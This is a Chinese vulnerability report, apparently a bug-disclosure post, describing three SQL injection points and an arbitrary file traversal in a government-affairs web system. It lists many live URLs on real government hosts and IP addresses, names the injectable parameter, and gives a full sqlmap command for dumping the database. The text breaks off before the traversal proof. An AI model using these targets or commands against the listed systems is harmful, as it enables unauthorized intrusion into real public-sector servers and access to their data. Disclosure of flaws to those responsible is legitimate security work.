某通用型政务系统3处SQL注入&任意文件遍历

某通用型政务系统3处 SQL注入 &任意文件遍历。 SQL注入 3处：http://58.222.195.110:8081/jyweb/powerpunish/powerpunish_condition_reg_page.aspxhttp://221.230.140.252/tzptweb//powerpunish/powerpunish_condition_reg_page.aspxhttp://58.222.211.21/xhweb//powerpunish/powerpunish_condition_reg_page.aspxhttp://qlgk.taizhou.gov.cn/tzptweb//powerpunish/powerpunish_condition_reg_page.aspxhttp://58.222.216.220/ggweb//powerpunish/powerpunish_condition_reg_page.aspxhttp://58.222.195.110:8081/jyweb/powerpunish/powerpunish_sort_reg_page.aspxhttp://221.230.140.252/tzptweb/powerpunish/powerpunish_sort_reg_page.aspxhttp://58.222.211.21/xhweb/powerpunish/powerpunish_sort_reg_page.aspxhttp://qlgk.taizhou.gov.cn/tzptweb/powerpunish/powerpunish_sort_reg_page.aspxhttp://58.222.216.220/ggweb/powerpunish/powerpunish_sort_reg_page.aspxhttp://58.222.195.110:8081/jyweb/powerpunish/powerpunish_type_reg_page.aspxhttp://221.230.140.252/tzptweb/powerpunish/powerpunish_type_reg_page.aspxhttp://58.222.211.21/xhweb/powerpunish/powerpunish_type_reg_page.aspxhttp://qlgk.taizhou.gov.cn/tzptweb/powerpunish/powerpunish_type_reg_page.aspxhttp://58.222.216.220/ggweb/powerpunish/powerpunish_type_reg_page.aspx注入证明：单引号报错。

注入参数：Key抓包后使用Sqlmap测试：python sqlmap.py -r /c/qlgk.taixing.gov.cn.txt -p Key --dbms mssql --level 5 --risk 3 --current-db --batch -v 3

任意文件遍历。案例：http://58.222.195.110:8081/jyweb/developer_tools/webresource_list_left_page.aspxhttp://qlgk.taizhou.gov.cn/tzptweb/developer_tools/webresource_list_left_page.aspxhttp://58.222.211.21/xhweb/developer_tools/webresource_list_left_page.aspxhttp://qlgk.taixing.gov.cn/developer_tools/webresource_list_left_page.aspxhttp://58.222.216.220/ggweb/developer_tools/webresource_list_left_page.aspx证明：